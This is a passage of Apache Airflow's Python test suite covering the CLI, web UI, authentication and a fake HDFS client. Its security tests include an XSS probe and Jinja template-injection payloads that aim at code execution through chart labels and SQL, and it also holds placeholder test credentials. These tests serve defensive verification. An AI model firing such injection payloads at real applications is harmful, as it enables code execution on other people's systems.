Attempt to delete with invalid cli args with mock.patch('sys.stdout', new_callable=six.StringIO) as mock_stdout: cli.connections(self.parser.parse_args( ['connections', '--delete', '--conn_id=fake', '--conn_uri=%s' % uri, '--conn_type=fake-type'])) stdout = mock_stdout.getvalue() # Check deletion attempt stdout lines = [l for l in stdout.split('\n') if len(l) > 0] self.assertListEqual(lines, [ ("\tThe following args are not compatible with the " + "--delete flag: ['conn_uri', 'conn_type']"), ]) session.close() def test_cli_test(self): cli.test(self.parser.parse_args([ 'test', 'example_bash_operator', 'runme_0', DEFAULT_DATE.isoformat()])) cli.test(self.parser.parse_args([ 'test', 'example_bash_operator', 'runme_0', '--dry_run', DEFAULT_DATE.isoformat()])) def test_cli_test_with_params(self): cli.test(self.parser.parse_args([ 'test', 'example_passing_params_via_test_command', 'run_this', '-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()])) cli.test(self.parser.parse_args([ 'test', 'example_passing_params_via_test_command', 'also_run_this', '-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()])) def test_cli_run(self): cli.run(self.parser.parse_args([ 'run', 'example_bash_operator', 'runme_0', '-l', DEFAULT_DATE.isoformat()])) def test_task_state(self): cli.task_state(self.parser.parse_args([ 'task_state', 'example_bash_operator', 'runme_0', DEFAULT_DATE.isoformat()])) def test_dag_state(self): self.assertEqual(None, cli.dag_state(self.parser.parse_args([ 'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()]))) def test_pause(self): args = self.parser.parse_args([ 'pause', 'example_bash_operator']) cli.pause(args) self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1]) args = self.parser.parse_args([ 'unpause', 'example_bash_operator']) cli.unpause(args) self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0]) def test_subdag_clear(self): args = self.parser.parse_args([ 'clear', 'example_subdag_operator', '--no_confirm']) cli.clear(args) args = self.parser.parse_args([ 'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags']) cli.clear(args) def test_parentdag_downstream_clear(self): args = self.parser.parse_args([ 'clear', 'example_subdag_operator.section-1', '--no_confirm']) cli.clear(args) args = self.parser.parse_args([ 'clear', 'example_subdag_operator.section-1', '--no_confirm', '--exclude_parentdag']) cli.clear(args) def test_get_dags(self): dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator', '-c'])) self.assertEqual(len(dags), 1) dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c'])) self.assertGreater(len(dags), 1) with self.assertRaises(AirflowException): cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c'])) def test_backfill(self): cli.backfill(self.parser.parse_args([ 'backfill', 'example_bash_operator', '-s', DEFAULT_DATE.isoformat()])) cli.backfill(self.parser.parse_args([ 'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run', '-s', DEFAULT_DATE.isoformat()])) cli.backfill(self.parser.parse_args([ 'backfill', 'example_bash_operator', '--dry_run', '-s', DEFAULT_DATE.isoformat()])) cli.backfill(self.parser.parse_args([ 'backfill', 'example_bash_operator', '-l', '-s', DEFAULT_DATE.isoformat()])) def test_process_subdir_path_with_placeholder(self): self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc')) def test_trigger_dag(self): cli.trigger_dag(self.parser.parse_args([ 'trigger_dag', 'example_bash_operator', '-c', '{"foo": "bar"}'])) self.assertRaises( ValueError, cli.trigger_dag, self.parser.parse_args([ 'trigger_dag', 'example_bash_operator', '--run_id', 'trigger_dag_xxx', '-c', 'NOT JSON']) ) def test_delete_dag(self): DM = models.DagModel key = "my_dag_id" session = settings.Session() session.add(DM(dag_id=key)) session.commit() cli.delete_dag(self.parser.parse_args([ 'delete_dag', key, '--yes'])) self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0) self.assertRaises( AirflowException, cli.delete_dag, self.parser.parse_args([ 'delete_dag', 'does_not_exist_dag', '--yes']) ) def test_pool_create(self): cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test'])) self.assertEqual(self.session.query(models.Pool).count(), 1) def test_pool_get(self): cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test'])) try: cli.pool(self.parser.parse_args(['pool', '-g', 'foo'])) except Exception as e: self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e) def test_pool_delete(self): cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test'])) cli.pool(self.parser.parse_args(['pool', '-x', 'foo'])) self.assertEqual(self.session.query(models.Pool).count(), 0) def test_pool_no_args(self): try: cli.pool(self.parser.parse_args(['pool'])) except Exception as e: self.fail("The 'pool' command raised unexpectedly: %s" % e) def test_pool_import_export(self): # Create two pools first pool_config_input = { "foo": { "description": "foo_test", "slots": 1 }, "baz": { "description": "baz_test", "slots": 2 } } with open('pools_import.json', mode='w') as f: json.dump(pool_config_input, f) # Import json try: cli.pool(self.parser.parse_args(['pool', '-i', 'pools_import.json'])) except Exception as e: self.fail("The 'pool -i pools_import.json' failed: %s" % e) # Export json try: cli.pool(self.parser.parse_args(['pool', '-e', 'pools_export.json'])) except Exception as e: self.fail("The 'pool -e pools_export.json' failed: %s" % e) with open('pools_export.json', mode='r') as f: pool_config_output = json.load(f) self.assertEqual( pool_config_input, pool_config_output, "Input and output pool files are not same") os.remove('pools_import.json') os.remove('pools_export.json') def test_variables(self): # Checks if all subcommands are properly received cli.variables(self.parser.parse_args([ 'variables', '-s', 'foo', '{"foo":"bar"}'])) cli.variables(self.parser.parse_args([ 'variables', '-g', 'foo'])) cli.variables(self.parser.parse_args([ 'variables', '-g', 'baz', '-d', 'bar'])) cli.variables(self.parser.parse_args([ 'variables'])) cli.variables(self.parser.parse_args([ 'variables', '-x', 'bar'])) cli.variables(self.parser.parse_args([ 'variables', '-i', DEV_NULL])) cli.variables(self.parser.parse_args([ 'variables', '-e', DEV_NULL])) cli.variables(self.parser.parse_args([ 'variables', '-s', 'bar', 'original'])) # First export cli.variables(self.parser.parse_args([ 'variables', '-e', 'variables1.json'])) first_exp = open('variables1.json', 'r') cli.variables(self.parser.parse_args([ 'variables', '-s', 'bar', 'updated'])) cli.variables(self.parser.parse_args([ 'variables', '-s', 'foo', '{"foo":"oops"}'])) cli.variables(self.parser.parse_args([ 'variables', '-x', 'foo'])) # First import cli.variables(self.parser.parse_args([ 'variables', '-i', 'variables1.json'])) self.assertEqual('original', models.Variable.get('bar')) self.assertEqual('{"foo": "bar"}', models.Variable.get('foo')) # Second export cli.variables(self.parser.parse_args([ 'variables', '-e', 'variables2.json'])) second_exp = open('variables2.json', 'r') self.assertEqual(first_exp.read(), second_exp.read()) second_exp.close() first_exp.close() # Second import cli.variables(self.parser.parse_args([ 'variables', '-i', 'variables2.json'])) self.assertEqual('original', models.Variable.get('bar')) self.assertEqual('{"foo": "bar"}', models.Variable.get('foo')) os.remove('variables1.json') os.remove('variables2.json') def _wait_pidfile(self, pidfile): while True: try: with open(pidfile) as f: return int(f.read()) except: sleep(1) def test_cli_webserver_foreground(self): # Confirm that webserver hasn't been launched. # pgrep returns exit status 1 if no process matched. self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait()) self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait()) # Run webserver in foreground and terminate it. p = subprocess.Popen(["airflow", "webserver"]) p.terminate() p.wait() # Assert that no process remains. self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait()) self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait()) @unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]), "Skipping test due to lack of required file permission") def test_cli_webserver_foreground_with_pid(self): # Run webserver in foreground with --pid option pidfile = tempfile.mkstemp()[1] p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile]) # Check the file specified by --pid option exists self._wait_pidfile(pidfile) # Terminate webserver p.terminate() p.wait() @unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]), "Skipping test due to lack of required file permission") def test_cli_webserver_background(self): import psutil # Confirm that webserver hasn't been launched. self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait()) self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait()) # Run webserver in background. subprocess.Popen(["airflow", "webserver", "-D"]) pidfile = cli.setup_locations("webserver")[0] self._wait_pidfile(pidfile) # Assert that gunicorn and its monitor are launched. self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait()) self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait()) # Terminate monitor process. pidfile = cli.setup_locations("webserver-monitor")[0] pid = self._wait_pidfile(pidfile) p = psutil.Process(pid) p.terminate() p.wait() # Assert that no process remains. self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait()) self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait()) # Patch for causing webserver timeout @mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0) def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _): # Shorten timeout so that this test doesn't take too long time configuration.conf.set("webserver", "web_server_master_timeout", "10") args = self.parser.parse_args(['webserver']) with self.assertRaises(SystemExit) as e: cli.webserver(args) self.assertEqual(e.exception.code, 1) class SecurityTests(unittest.TestCase): def setUp(self): configuration.load_test_config() configuration.conf.set("webserver", "authenticate", "False") configuration.conf.set("webserver", "expose_config", "True") app = application.create_app() app.config['TESTING'] = True self.app = app.test_client() self.dagbag = models.DagBag( dag_folder=DEV_NULL, include_examples=True) self.dag_bash = self.dagbag.dags['example_bash_operator'] self.runme_0 = self.dag_bash.get_task('runme_0') def get_csrf(self, response): tree = html.fromstring(response.data) form = tree.find('.//form') return form.find('.//input[@name="_csrf_token"]').value def test_csrf_rejection(self): endpoints = ([ "/admin/queryview/", "/admin/airflow/paused?dag_id=example_python_operator&is_paused=false", ]) for endpoint in endpoints: response = self.app.post(endpoint) self.assertIn('CSRF token is missing', response.data.decode('utf-8')) def test_csrf_acceptance(self): response = self.app.get("/admin/queryview/") csrf = self.get_csrf(response) response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf)) self.assertEqual(200, response.status_code) def test_xss(self): try: self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>") except: # exception is expected here since dag doesnt exist pass response = self.app.get("/admin/log", follow_redirects=True) self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8')) def test_chart_data_template(self): """Protect chart_data from being able to do RCE.""" session = settings.Session() Chart = models.Chart chart1 = Chart( label='insecure_chart', conn_id='airflow_db', chart_type='bar', sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}" ) chart2 = Chart( label="{{ ''.__class__.__mro__[1].__subclasses__() }}", conn_id='airflow_db', chart_type='bar', sql="SELECT 1" ) chart3 = Chart( label="{{ subprocess.check_output('ls') }}", conn_id='airflow_db', chart_type='bar', sql="SELECT 1" ) session.add(chart1) session.add(chart2) session.add(chart3) session.commit() chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first() with self.assertRaises(SecurityError): self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id)) chart2 = session.query(Chart).filter( Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}" ).first() with self.assertRaises(SecurityError): self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id)) chart3 = session.query(Chart).filter( Chart.label == "{{ subprocess.check_output('ls') }}" ).first() with self.assertRaises(UndefinedError): self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id)) def tearDown(self): configuration.conf.set("webserver", "expose_config", "False") self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow()) class WebUiTests(unittest.TestCase): def setUp(self): configuration.load_test_config() configuration.conf.set("webserver", "authenticate", "False") configuration.conf.set("webserver", "expose_config", "True") app = application.create_app() app.config['TESTING'] = True app.config['WTF_CSRF_METHODS'] = [] self.app = app.test_client() self.dagbag = models.DagBag(include_examples=True) self.dag_bash = self.dagbag.dags['example_bash_operator'] self.dag_python = self.dagbag.dags['example_python_operator'] self.sub_dag = self.dagbag.dags['example_subdag_operator'] self.runme_0 = self.dag_bash.get_task('runme_0') self.example_xcom = self.dagbag.dags['example_xcom'] self.dagrun_python = self.dag_python.create_dagrun( run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())), execution_date=DEFAULT_DATE, start_date=timezone.utcnow(), state=State.RUNNING ) self.sub_dag.create_dagrun( run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())), execution_date=DEFAULT_DATE, start_date=timezone.utcnow(), state=State.RUNNING ) self.example_xcom.create_dagrun( run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())), execution_date=DEFAULT_DATE, start_date=timezone.utcnow(), state=State.RUNNING ) def test_index(self): response = self.app.get('/', follow_redirects=True) resp_html = response.data.decode('utf-8') self.assertIn("DAGs", resp_html) self.assertIn("example_bash_operator", resp_html) # The HTML should contain data for the last-run. A link to the specific run, # and the text of the date. url = "/admin/airflow/graph?" + urlencode({ "dag_id": self.dag_python.dag_id, "execution_date": self.dagrun_python.execution_date, }).replace("&", "&amp;") self.assertIn(url, resp_html) self.assertIn( self.dagrun_python.execution_date.strftime("%Y-%m-%d %H:%M"), resp_html) def test_query(self): response = self.app.get('/admin/queryview/') self.assertIn("Ad Hoc Query", response.data.decode('utf-8')) response = self.app.post( "/admin/queryview/", data=dict( conn_id="airflow_db", sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance")) self.assertIn("TEST", response.data.decode('utf-8')) def test_health(self): response = self.app.get('/health') self.assertIn('The server is healthy!', response.data.decode('utf-8')) def test_noaccess(self): response = self.app.get('/admin/airflow/noaccess') self.assertIn("You don't seem to have access.", response.data.decode('utf-8')) def test_pickle_info(self): response = self.app.get('/admin/airflow/pickle_info') self.assertIn('{', response.data.decode('utf-8')) def test_dag_views(self): response = self.app.get( '/admin/airflow/graph?dag_id=example_bash_operator') self.assertIn("runme_0", response.data.decode('utf-8')) # confirm that the graph page loads when execution_date is blank response = self.app.get( '/admin/airflow/graph?dag_id=example_bash_operator&execution_date=') self.assertIn("runme_0", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator') self.assertIn("runme_0", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/duration?days=30&dag_id=example_bash_operator') self.assertIn("example_bash_operator", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/tries?days=30&dag_id=example_bash_operator') self.assertIn("example_bash_operator", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/landing_times?' 'days=30&dag_id=example_python_operator') self.assertIn("example_python_operator", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/landing_times?' 'days=30&dag_id=example_xcom') self.assertIn("example_xcom", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/gantt?dag_id=example_bash_operator') self.assertIn("example_bash_operator", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/code?dag_id=example_bash_operator') self.assertIn("example_bash_operator", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/blocked') response = self.app.get( '/admin/configurationview/') self.assertIn("Airflow Configuration", response.data.decode('utf-8')) self.assertIn("Running Configuration", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/rendered?' 'task_id=runme_1&dag_id=example_bash_operator&' 'execution_date={}'.format(DEFAULT_DATE_ISO)) self.assertIn("example_bash_operator", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/log?task_id=run_this_last&' 'dag_id=example_bash_operator&execution_date={}' ''.format(DEFAULT_DATE_ISO)) self.assertIn("run_this_last", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/task?' 'task_id=runme_0&dag_id=example_bash_operator&' 'execution_date={}'.format(DEFAULT_DATE_DS)) self.assertIn("Attributes", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/dag_stats') self.assertIn("example_bash_operator", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/task_stats') self.assertIn("example_bash_operator", response.data.decode('utf-8')) url = ( "/admin/airflow/success?task_id=print_the_context&" "dag_id=example_python_operator&upstream=false&downstream=false&" "future=false&past=false&execution_date={}&" "origin=/admin".format(DEFAULT_DATE_DS)) response = self.app.get(url) self.assertIn("Wait a minute", response.data.decode('utf-8')) response = self.app.get(url + "&confirmed=true") response = self.app.get( '/admin/airflow/clear?task_id=print_the_context&' 'dag_id=example_python_operator&future=true&past=false&' 'upstream=true&downstream=false&' 'execution_date={}&' 'origin=/admin'.format(DEFAULT_DATE_DS)) self.assertIn("Wait a minute", response.data.decode('utf-8')) url = ( "/admin/airflow/success?task_id=section-1&" "dag_id=example_subdag_operator&upstream=true&downstream=true&" "future=false&past=false&execution_date={}&" "origin=/admin".format(DEFAULT_DATE_DS)) response = self.app.get(url) self.assertIn("Wait a minute", response.data.decode('utf-8')) self.assertIn("section-1-task-1", response.data.decode('utf-8')) self.assertIn("section-1-task-2", response.data.decode('utf-8')) self.assertIn("section-1-task-3", response.data.decode('utf-8')) self.assertIn("section-1-task-4", response.data.decode('utf-8')) self.assertIn("section-1-task-5", response.data.decode('utf-8')) response = self.app.get(url + "&confirmed=true") url = ( "/admin/airflow/clear?task_id=print_the_context&" "dag_id=example_python_operator&future=false&past=false&" "upstream=false&downstream=true&" "execution_date={}&" "origin=/admin".format(DEFAULT_DATE_DS)) response = self.app.get(url) self.assertIn("Wait a minute", response.data.decode('utf-8')) response = self.app.get(url + "&confirmed=true") url = ( "/admin/airflow/clear?task_id=section-1-task-1&" "dag_id=example_subdag_operator.section-1&future=false&past=false&" "upstream=false&downstream=true&recursive=true&" "execution_date={}&" "origin=/admin".format(DEFAULT_DATE_DS)) response = self.app.get(url) self.assertIn("Wait a minute", response.data.decode('utf-8')) self.assertIn("example_subdag_operator.end", response.data.decode('utf-8')) self.assertIn("example_subdag_operator.section-1.section-1-task-1", response.data.decode('utf-8')) self.assertIn("example_subdag_operator.section-1", response.data.decode('utf-8')) self.assertIn("example_subdag_operator.section-2", response.data.decode('utf-8')) self.assertIn("example_subdag_operator.section-2.section-2-task-1", response.data.decode('utf-8')) self.assertIn("example_subdag_operator.section-2.section-2-task-2", response.data.decode('utf-8')) self.assertIn("example_subdag_operator.section-2.section-2-task-3", response.data.decode('utf-8')) self.assertIn("example_subdag_operator.section-2.section-2-task-4", response.data.decode('utf-8')) self.assertIn("example_subdag_operator.section-2.section-2-task-5", response.data.decode('utf-8')) self.assertIn("example_subdag_operator.some-other-task", response.data.decode('utf-8')) url = ( "/admin/airflow/run?task_id=runme_0&" "dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&" "ignore_task_deps=true&execution_date={}&" "origin=/admin".format(DEFAULT_DATE_DS)) response = self.app.get(url) response = self.app.get( "/admin/airflow/refresh?dag_id=example_bash_operator") response = self.app.get("/admin/airflow/refresh_all") response = self.app.post( "/admin/airflow/paused?" "dag_id=example_python_operator&is_paused=false") self.assertIn("OK", response.data.decode('utf-8')) response = self.app.get("/admin/xcom", follow_redirects=True) self.assertIn("Xcoms", response.data.decode('utf-8')) def test_charts(self): session = Session() chart_label = "Airflow task instance by type" chart = session.query( models.Chart).filter(models.Chart.label == chart_label).first() chart_id = chart.id session.close() response = self.app.get( '/admin/airflow/chart' '?chart_id={}&iteration_no=1'.format(chart_id)) self.assertIn("Airflow task instance by type", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/chart_data' '?chart_id={}&iteration_no=1'.format(chart_id)) self.assertIn("example", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/dag_details?dag_id=example_branch_operator') self.assertIn("run_this_first", response.data.decode('utf-8')) def test_fetch_task_instance(self): url = ( "/admin/airflow/object/task_instances?" "dag_id=example_python_operator&" "execution_date={}".format(DEFAULT_DATE_DS)) response = self.app.get(url) self.assertIn("print_the_context", response.data.decode('utf-8')) def test_dag_view_task_with_python_operator_using_partial(self): response = self.app.get( '/admin/airflow/task?' 'task_id=test_dagrun_functool_partial&dag_id=test_task_view_type_check&' 'execution_date={}'.format(DEFAULT_DATE_DS)) self.assertIn("A function with two args", response.data.decode('utf-8')) def test_dag_view_task_with_python_operator_using_instance(self): response = self.app.get( '/admin/airflow/task?' 'task_id=test_dagrun_instance&dag_id=test_task_view_type_check&' 'execution_date={}'.format(DEFAULT_DATE_DS)) self.assertIn("A __call__ method", response.data.decode('utf-8')) def tearDown(self): configuration.conf.set("webserver", "expose_config", "False") self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow()) session = Session() session.query(models.DagRun).delete() session.query(models.TaskInstance).delete() session.commit() session.close() class SecureModeWebUiTests(unittest.TestCase): def setUp(self): configuration.load_test_config() configuration.conf.set("webserver", "authenticate", "False") configuration.conf.set("core", "secure_mode", "True") app = application.create_app() app.config['TESTING'] = True self.app = app.test_client() def test_query(self): response = self.app.get('/admin/queryview/') self.assertEqual(response.status_code, 404) def test_charts(self): response = self.app.get('/admin/chart/') self.assertEqual(response.status_code, 404) def tearDown(self): configuration.conf.remove_option("core", "SECURE_MODE") class PasswordUserTest(unittest.TestCase): def setUp(self): user = models.User() from airflow.contrib.auth.backends.password_auth import PasswordUser self.password_user = PasswordUser(user) self.password_user.username = "password_test" @mock.patch('airflow.contrib.auth.backends.password_auth.generate_password_hash') def test_password_setter(self, mock_gen_pass_hash): mock_gen_pass_hash.return_value = b"hashed_pass" if six.PY3 else "hashed_pass" self.password_user.password = "secure_password" mock_gen_pass_hash.assert_called_with("secure_password", 12) def test_password_unicode(self): # In python2.7 no conversion is required back to str # In python >= 3 the method must convert from bytes to str self.password_user.password = "secure_password" self.assertIsInstance(self.password_user.password, str) def test_password_user_authenticate(self): self.password_user.password = "secure_password" self.assertTrue(self.password_user.authenticate("secure_password")) def test_password_authenticate_session(self): from airflow.contrib.auth.backends.password_auth import PasswordUser self.password_user.password = 'test_password' session = Session() session.add(self.password_user) session.commit() query_user = session.query(PasswordUser).filter_by( username=self.password_user.username).first() self.assertTrue(query_user.authenticate('test_password')) session.query(models.User).delete() session.commit() session.close() class WebPasswordAuthTest(unittest.TestCase): def setUp(self): configuration.conf.set("webserver", "authenticate", "True") configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth") app = application.create_app() app.config['TESTING'] = True self.app = app.test_client() from airflow.contrib.auth.backends.password_auth import PasswordUser session = Session() user = models.User() password_user = PasswordUser(user) password_user.username = 'airflow_passwordauth' password_user.password = 'password' print(password_user._password) session.add(password_user) session.commit() session.close() def get_csrf(self, response): tree = html.fromstring(response.data) form = tree.find('.//form') return form.find('.//input[@name="_csrf_token"]').value def login(self, username, password): response = self.app.get('/admin/airflow/login') csrf_token = self.get_csrf(response) return self.app.post('/admin/airflow/login', data=dict( username=username, password=password, csrf_token=csrf_token ), follow_redirects=True) def logout(self): return self.app.get('/admin/airflow/logout', follow_redirects=True) def test_login_logout_password_auth(self): self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate')) response = self.login('user1', 'whatever') self.assertIn('Incorrect login details', response.data.decode('utf-8')) response = self.login('airflow_passwordauth', 'wrongpassword') self.assertIn('Incorrect login details', response.data.decode('utf-8')) response = self.login('airflow_passwordauth', 'password') self.assertIn('Data Profiling', response.data.decode('utf-8')) response = self.logout() self.assertIn('form-signin', response.data.decode('utf-8')) def test_unauthorized_password_auth(self): response = self.app.get("/admin/airflow/landing_times") self.assertEqual(response.status_code, 302) def tearDown(self): configuration.load_test_config() session = Session() session.query(models.User).delete() session.commit() session.close() configuration.conf.set("webserver", "authenticate", "False") class WebLdapAuthTest(unittest.TestCase): def setUp(self): configuration.conf.set("webserver", "authenticate", "True") configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth") try: configuration.conf.add_section("ldap") except: pass configuration.conf.set("ldap", "uri", "ldap://openldap:389") configuration.conf.set("ldap", "user_filter", "objectClass=*") configuration.conf.set("ldap", "user_name_attr", "uid") configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com") configuration.conf.set("ldap", "bind_password", "insecure") configuration.conf.set("ldap", "basedn", "dc=example,dc=com") configuration.conf.set("ldap", "cacert", "") app = application.create_app() app.config['TESTING'] = True self.app = app.test_client() def get_csrf(self, response): tree = html.fromstring(response.data) form = tree.find('.//form') return form.find('.//input[@name="_csrf_token"]').value def login(self, username, password): response = self.app.get('/admin/airflow/login') csrf_token = self.get_csrf(response) return self.app.post('/admin/airflow/login', data=dict( username=username, password=password, csrf_token=csrf_token ), follow_redirects=True) def logout(self): return self.app.get('/admin/airflow/logout', follow_redirects=True) def test_login_logout_ldap(self): self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate')) response = self.login('user1', 'userx') self.assertIn('Incorrect login details', response.data.decode('utf-8')) response = self.login('userz', 'user1') self.assertIn('Incorrect login details', response.data.decode('utf-8')) response = self.login('user1', 'user1') self.assertIn('Data Profiling', response.data.decode('utf-8')) response = self.logout() self.assertIn('form-signin', response.data.decode('utf-8')) def test_unauthorized(self): response = self.app.get("/admin/airflow/landing_times") self.assertEqual(response.status_code, 302) def test_no_filter(self): response = self.login('user1', 'user1') self.assertIn('Data Profiling', response.data.decode('utf-8')) self.assertIn('Connections', response.data.decode('utf-8')) def test_with_filters(self): configuration.conf.set('ldap', 'superuser_filter', 'description=superuser') configuration.conf.set('ldap', 'data_profiler_filter', 'description=dataprofiler') response = self.login('dataprofiler', 'dataprofiler') self.assertIn('Data Profiling', response.data.decode('utf-8')) response = self.logout() self.assertIn('form-signin', response.data.decode('utf-8')) response = self.login('superuser', 'superuser') self.assertIn('Connections', response.data.decode('utf-8')) def tearDown(self): configuration.load_test_config() session = Session() session.query(models.User).delete() session.commit() session.close() configuration.conf.set("webserver", "authenticate", "False") class LdapGroupTest(unittest.TestCase): def setUp(self): configuration.conf.set("webserver", "authenticate", "True") configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth") try: configuration.conf.add_section("ldap") except: pass configuration.conf.set("ldap", "uri", "ldap://openldap:389") configuration.conf.set("ldap", "user_filter", "objectClass=*") configuration.conf.set("ldap", "user_name_attr", "uid") configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com") configuration.conf.set("ldap", "bind_password", "insecure") configuration.conf.set("ldap", "basedn", "dc=example,dc=com") configuration.conf.set("ldap", "cacert", "") def test_group_belonging(self): from airflow.contrib.auth.backends.ldap_auth import LdapUser users = {"user1": ["group1", "group3"], "user2": ["group2"] } for user in users: mu = models.User(username=user, is_superuser=False) auth = LdapUser(mu) self.assertEqual(set(users[user]), set(auth.ldap_groups)) def tearDown(self): configuration.load_test_config() configuration.conf.set("webserver", "authenticate", "False") class FakeWebHDFSHook(object): def __init__(self, conn_id): self.conn_id = conn_id def get_conn(self): return self.conn_id def check_for_path(self, hdfs_path): return hdfs_path class FakeSnakeBiteClientException(Exception): pass class FakeSnakeBiteClient(object): def __init__(self): self.started = True def ls(self, path, include_toplevel=False): """ the fake snakebite client :param path: the array of path to test :param include_toplevel: to return the toplevel directory info :return: a list for path for the matching queries """ if path[0] == '/datadirectory/empty_directory' and not include_toplevel: return [] elif path[0] == '/datadirectory/datafile': return [{ 'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796, 'block_replication': 3, 'modification_time': 1481122343862, 'length': 0, 'blocksize': 134217728, 'owner': u'hdfs', 'path': '/datadirectory/datafile' }] elif path[0] == '/datadirectory/empty_directory' and include_toplevel: return [{ 'group': u'supergroup', 'permission': 493, 'file_type': 'd', 'access_time': 0, 'block_replication': 0, 'modification_time': 1481132141540, 'length': 0, 'blocksize': 0, 'owner': u'hdfs', 'path': '/datadirectory/empty_directory' }] elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel: return [{ 'group': u'supergroup', 'permission': 493, 'file_type': 'd', 'access_time': 0, 'block_replication': 0, 'modification_time': 1481132141540, 'length': 0, 'blocksize': 0, 'owner': u'hdfs', 'path': '/datadirectory/empty_directory' }, { 'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796, 'block_replication': 3, 'modification_time': 1481122343862, 'length': 0, 'blocksize': 134217728, 'owner': u'hdfs', 'path': '/datadirectory/not_empty_directory/test_file' }] elif path[0] == '/datadirectory/not_empty_directory': return [{ 'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796, 'block_replication': 3, 'modification_time': 1481122343862, 'length': 0, 'blocksize': 134217728, 'owner': u'hdfs', 'path': '/datadirectory/not_empty_directory/test_file' }] elif path[0] == '/datadirectory/not_existing_file_or_directory': raise FakeSnakeBiteClientException elif path[0] == '/datadirectory/regex_dir': return [{ 'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796, 'block_replication': 3, 'modification_time': 1481122343862, 'length': 12582912, 'blocksize': 134217728, 'owner': u'hdfs', 'path': '/datadirectory/regex_dir/test1file' }, { 'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796, 'block_replication': 3, 'modification_time': 1481122343862, 'length': 12582912, 'blocksize': 134217728, 'owner': u'hdfs', 'path': '/datadirectory/regex_dir/test2file' }, { 'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796, 'block_replication': 3, 'modification_time': 1481122343862, 'length': 12582912, 'blocksize': 134217728, 'owner': u'hdfs', 'path': '/datadirectory/regex_dir/test3file' }, { 'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796, 'block_replication': 3, 'modification_time': 1481122343862, 'length': 12582912, 'blocksize': 134217728, 'owner': u'hdfs', 'path': 